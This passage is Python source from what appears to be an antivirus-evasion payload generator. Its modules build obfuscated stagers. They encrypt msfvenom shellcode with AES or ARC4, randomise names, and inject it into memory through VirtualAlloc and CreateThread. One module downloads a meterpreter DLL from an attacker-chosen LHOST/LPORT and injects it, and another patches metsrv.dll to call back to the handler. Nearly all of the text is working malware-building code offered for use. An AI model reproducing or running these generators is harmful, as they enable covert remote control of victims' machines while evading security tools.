helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() known_plaintext_string = helpers.randomString() plaintext_string_variable = helpers.randomString() key_guess = helpers.randomString() secret_key = helpers.randomString() small_constrained_key_variable = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, partial_key, secret) = encryption.constrainedAES(Shellcode) # Use the secret we received earlier to encrypt our known plaintext string encrypted_plaintext_string = encryption.knownPlaintext(secret, known_plaintext_string) # Create Payload code PayloadCode = 'from ctypes import *\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += small_constrained_key_variable + ' = \'' + partial_key + '\'\n' PayloadCode += RandPadding + ' = \'{\'\n' PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += 'for ' + key_guess + ' in range(100000, 1000000):\n' PayloadCode += '\t' + secret_key + " = " + small_constrained_key_variable + ' + str(' + key_guess + ')\n' PayloadCode += '\t' + RandCipherObject + ' = AES.new(' + secret_key + ')\n' PayloadCode += '\t' + plaintext_string_variable + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + encrypted_plaintext_string + '\')\n' PayloadCode += '\tif ' + plaintext_string_variable + ' == \'' + known_plaintext_string + '\':\n' PayloadCode += '\t\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += '\t\t' + ShellcodeVariableName + ' = ' + RandDecodedShellcode + '.decode("string_escape")\n' PayloadCode += '\t\t' + RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n' PayloadCode += '\t\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += '\t\t' + RandShellcode + '()' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() known_plaintext_string = helpers.randomString() plaintext_string_variable = helpers.randomString() key_guess = helpers.randomString() secret_key = helpers.randomString() small_constrained_key_variable = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, partial_key, secret) = encryption.constrainedAES(Shellcode) # Use the secret we received earlier to encrypt our known plaintext string encrypted_plaintext_string = encryption.knownPlaintext(secret, known_plaintext_string) # Create Payload code PayloadCode = 'from ctypes import *\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + small_constrained_key_variable + ' = \'' + partial_key + '\'\n' PayloadCode += '\t' + RandPadding + ' = \'{\'\n' PayloadCode += '\t' + RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += '\tfor ' + key_guess + ' in range(100000, 1000000):\n' PayloadCode += '\t\t' + secret_key + " = " + small_constrained_key_variable + ' + str(' + key_guess + ')\n' PayloadCode += '\t\t' + RandCipherObject + ' = AES.new(' + secret_key + ')\n' PayloadCode += '\t\t' + plaintext_string_variable + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + encrypted_plaintext_string + '\')\n' PayloadCode += '\t\tif ' + plaintext_string_variable + ' == \'' + known_plaintext_string + '\':\n' PayloadCode += '\t\t\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += '\t\t\t' + ShellcodeVariableName + ' = ' + RandDecodedShellcode + '.decode("string_escape")\n' PayloadCode += '\t\t\t' + RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n' PayloadCode += '\t\t\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += '\t\t\t' + RandShellcode + '()' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode
def generate(self): payloadCode = "import urllib2, string, random, struct, ctypes, httplib, time\n" # randomize everything, yo' sumMethodName = helpers.randomString() checkinMethodName = helpers.randomString() randLettersName = helpers.randomString() randLetterSubName = helpers.randomString() randBaseName = helpers.randomString() downloadMethodName = helpers.randomString() hostName = helpers.randomString() portName = helpers.randomString() requestName = helpers.randomString() responseName = helpers.randomString() injectMethodName = helpers.randomString() dataName = helpers.randomString() byteArrayName = helpers.randomString() ptrName = helpers.randomString() bufName = helpers.randomString() handleName = helpers.randomString() data2Name = helpers.randomString() # helper method that returns the sum of all ord values in a string % 0x100 payloadCode += "def %s(s): return sum([ord(ch) for ch in s]) %% 0x100\n" %(sumMethodName) # method that generates a new checksum value for checkin to the meterpreter handler payloadCode += "def %s():\n\tfor x in xrange(64):\n" %(checkinMethodName) payloadCode += "\t\t%s = ''.join(random.sample(string.ascii_letters + string.digits,3))\n" %(randBaseName) payloadCode += "\t\t%s = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))\n" %(randLettersName) payloadCode += "\t\tfor %s in %s:\n" %(randLetterSubName, randLettersName) payloadCode += "\t\t\tif %s(%s + %s) == 92: return %s + %s\n" %(sumMethodName, randBaseName, randLetterSubName, randBaseName, randLetterSubName) # method that connects to a host/port over https and downloads the hosted data payloadCode += "def %s(%s,%s):\n" %(downloadMethodName, hostName, portName) payloadCode += "\t%s = httplib.HTTPSConnection(%s, %s)\n" %(requestName, hostName, portName) payloadCode += "\t%s.request(\"GET\", \"/\" + %s() )\n" %(requestName, checkinMethodName) payloadCode += "\t%s = %s.getresponse()\n" %(responseName, requestName) payloadCode += "\tif %s.status == 200: return %s.read()\n" %(responseName, responseName) payloadCode += "\telse: return \"\"\n" # method to inject a reflective .dll into memory payloadCode += "def %s(%s):\n" %(injectMethodName, dataName) payloadCode += "\tif %s != \"\":\n" %(dataName) payloadCode += "\t\t%s = bytearray(%s)\n" %(byteArrayName, dataName) payloadCode += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)), ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" %(ptrName, byteArrayName) payloadCode += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" %(bufName, byteArrayName, byteArrayName) payloadCode += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s),%s, ctypes.c_int(len(%s)))\n" %(ptrName, bufName, byteArrayName) payloadCode += "\t\t%s = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" %(handleName, ptrName) payloadCode += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(%s),ctypes.c_int(-1))\n" %(handleName) # download the metpreter .dll and inject it payloadCode += "%s = ''\n" %(data2Name) payloadCode += "%s = %s(\"%s\", %s)\n" %(data2Name, downloadMethodName, self.required_options["LHOST"][0], self.required_options["LPORT"][0]) payloadCode += "%s(%s)\n" %(injectMethodName, data2Name) if self.required_options["use_pyherion"][0].lower() == "y": payloadCode = encryption.pyherion(payloadCode) return payloadCode
def generate(self): if self.required_options["inject_method"][0].lower() == "virtual": if self.required_options["expire_payload"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() ShellcodeVariableName = helpers.randomString() RandIV = helpers.randomString() RandARCKey = helpers.randomString() RandARCPayload = helpers.randomString() RandEncShellCodePayload = helpers.randomString() # encrypt the shellcode and get our randomized key/iv (EncShellCode, (ARCKey, iv) ) = encryption.encryptARC(Shellcode) PayloadCode = 'from Crypto.Cipher import ARC4\n' PayloadCode += 'import ctypes\n' PayloadCode += RandIV + ' = \'' + iv + '\'\n' PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n' PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n' PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n' PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n' PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() ShellcodeVariableName = helpers.randomString() RandIV = helpers.randomString() RandARCKey = helpers.randomString() RandARCPayload = helpers.randomString() RandEncShellCodePayload = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() # encrypt the shellcode and get our randomized key/iv (EncShellCode, (ARCKey, iv) ) = encryption.encryptARC(Shellcode) PayloadCode = 'from Crypto.Cipher import ARC4\n' PayloadCode += 'import ctypes\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n' PayloadCode += '\t' + RandARCKey + ' = \'' + ARCKey + '\'\n' PayloadCode += '\t' + RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n' PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n' PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n' PayloadCode += '\t' + RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' PayloadCode += '\t' + RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += '\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: if self.required_options["expire_payload"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() ShellcodeVariableName = helpers.randomString() RandIV = helpers.randomString() RandARCKey = helpers.randomString() RandARCPayload = helpers.randomString() RandEncShellCodePayload = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() # encrypt the shellcode and get our randomized key/iv (EncShellCode, (ARCKey, iv) ) = encryption.encryptARC(Shellcode) PayloadCode = 'from Crypto.Cipher import ARC4\n' PayloadCode += 'from ctypes import *\n' PayloadCode += RandIV + ' = \'' + iv + '\'\n' PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n' PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n' PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n' PayloadCode += ShellcodeVariableName + ' = ' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n' PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n' PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += RandShellcode + '()' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() ShellcodeVariableName = helpers.randomString() RandIV = helpers.randomString() RandARCKey = helpers.randomString() RandARCPayload = helpers.randomString() RandEncShellCodePayload = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() # encrypt the shellcode and get our randomized key/iv (EncShellCode, (ARCKey, iv) ) = encryption.encryptARC(Shellcode) PayloadCode = 'from Crypto.Cipher import ARC4\n' PayloadCode += 'from ctypes import *\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n' PayloadCode += '\t' + RandARCKey + ' = \'' + ARCKey + '\'\n' PayloadCode += '\t' + RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n' PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n' PayloadCode += '\t' + ShellcodeVariableName + ' = ' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n' PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n' PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += '\t' + RandShellcode + '()' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode
def generate(self): if os.path.exists(settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll"): metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll" else: metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.dll" f = open(metsrvPath, "rb") meterpreterDll = f.read() f.close() # lambda function used for patching the metsvc.dll dllReplace = lambda dll, ind, s: dll[:ind] + s + dll[ind + len(s) :] # patch the metsrv.dll header headerPatch = "\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3\x57" headerPatch += "\x87\x05\x00\xff\xd3\x89\xc3\x57\x68\x04\x00\x00\x00\x50\xff\xd0" headerPatch += "\x68\xe0\x1d\x2a\x0a\x68\x05\x00\x00\x00\x50\xff\xd3\x00\x00\x00" meterpreterDll = dllReplace(meterpreterDll, 0, headerPatch) # patch in the default user agent string userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00") userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00" meterpreterDll = dllReplace(meterpreterDll, userAgentIndex, userAgentString) # turn off SSL sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL") sslString = "METERPRETER_TRANSPORT_HTTP\x00" meterpreterDll = dllReplace(meterpreterDll, sslIndex, sslString) # replace the URL/port of the handler urlIndex = meterpreterDll.index("https://" + ("X" * 256)) urlString = ( "http://" + self.required_options["LHOST"][0] + ":" + str(self.required_options["LPORT"][0]) + "/" + self.genHTTPChecksum() + "_" + helpers.randomString(16) + "/\x00" ) meterpreterDll = dllReplace(meterpreterDll, urlIndex, urlString) # replace the expiration timeout with the default value of 300 expirationTimeoutIndex = meterpreterDll.index(struct.pack("<I", 0xB64BE661)) expirationTimeout = struct.pack("<I", 604800) meterpreterDll = dllReplace(meterpreterDll, expirationTimeoutIndex, expirationTimeout) # replace the communication timeout with the default value of 300 communicationTimeoutIndex = meterpreterDll.index(struct.pack("<I", 0xAF79257F)) communicationTimeout = struct.pack("<I", 300) meterpreterDll = dllReplace(meterpreterDll, communicationTimeoutIndex, communicationTimeout) # compress/base64 encode the dll compressedDll = helpers.deflate(meterpreterDll) # actually build out the payload payloadCode = "" # traditional void pointer injection if self.required_options["inject_method"][0].lower() == "void": # doing void * cast payloadCode += "from ctypes import *\nimport base64,zlib\n" randInflateFuncName = helpers.randomString() randb64stringName = helpers.randomString() randVarName = helpers.randomString() # deflate function payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + "):\n" payloadCode += "\t" + randVarName + " = base64.b64decode( " + randb64stringName + " )\n" payloadCode += "\treturn zlib.decompress( " + randVarName + " , -15)\n" randVarName = helpers.randomString() randFuncName = helpers.randomString() payloadCode += randVarName + " = " + randInflateFuncName + '("' + compressedDll + '")\n' payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n" payloadCode += randFuncName + "()\n" # VirtualAlloc() injection else: payloadCode += "import ctypes,base64,zlib\n" randInflateFuncName = helpers.randomString() randb64stringName = helpers.randomString() randVarName = helpers.randomString() randPtr = helpers.randomString() randBuf = helpers.randomString() randHt = helpers.randomString() # deflate function payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + "):\n" payloadCode += "\t" + randVarName + " = base64.b64decode( " + randb64stringName + " )\n" payloadCode += "\treturn zlib.decompress( " + randVarName + " , -15)\n" payloadCode += randVarName + " = bytearray(" + randInflateFuncName + '("' + compressedDll + '"))\n' payloadCode += ( randPtr + " = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(" + randVarName + ")),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" ) payloadCode += randBuf + " = (ctypes.c_char * len(" + randVarName + ")).from_buffer(" + randVarName + ")\n" payloadCode += ( "ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(" + randPtr + ")," + randBuf + ",ctypes.c_int(len(" + randVarName + ")))\n" ) payloadCode += ( randHt + " = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(" + randPtr + "),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" ) payloadCode += "ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(" + randHt + "),ctypes.c_int(-1))\n" if self.required_options["use_pyherion"][0].lower() == "y": payloadCode = encryption.pyherion(payloadCode) return payloadCode
def generate(self): if self.required_options["INJECT_METHOD"][0].lower() == "virtual": if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() randctypes = helpers.randomString() # Create Payload code PayloadCode = ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n' PayloadCode += 'import ctypes as ' + randctypes + '\n' PayloadCode += RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ ShellcodeVariableName +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n' PayloadCode += RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' PayloadCode += randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() randctypes = helpers.randomString() # Create Payload code PayloadCode = 'import ctypes as ' + randctypes + '\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n' PayloadCode += '\t' + RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ ShellcodeVariableName +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n' PayloadCode += '\t' + RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += '\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += '\t' + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' PayloadCode += '\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode if self.required_options["INJECT_METHOD"][0].lower() == "heap": if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() HeapVar = helpers.randomString() randctypes = helpers.randomString() # Create Payload code PayloadCode = 'import ctypes as ' + randctypes + '\n' PayloadCode += ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n' PayloadCode += HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n' PayloadCode += RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n' PayloadCode += RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' PayloadCode += randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() HeapVar = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() randctypes = helpers.randomString() # Create Payload code PayloadCode = 'import ctypes as ' + randctypes + '\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n' PayloadCode += '\t' + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n' PayloadCode += '\t' + RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n' PayloadCode += '\t' + RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += '\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += '\t' + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' PayloadCode += '\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Generate Random Variable Names RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() PayloadCode = 'from ctypes import *\n' PayloadCode += RandReverseShell + ' = \"' + Shellcode + '\"\n' PayloadCode += RandMemoryShell + ' = create_string_buffer(' + RandReverseShell + ', len(' + RandReverseShell + '))\n' PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += RandShellcode + '()' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Generate Random Variable Names RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() 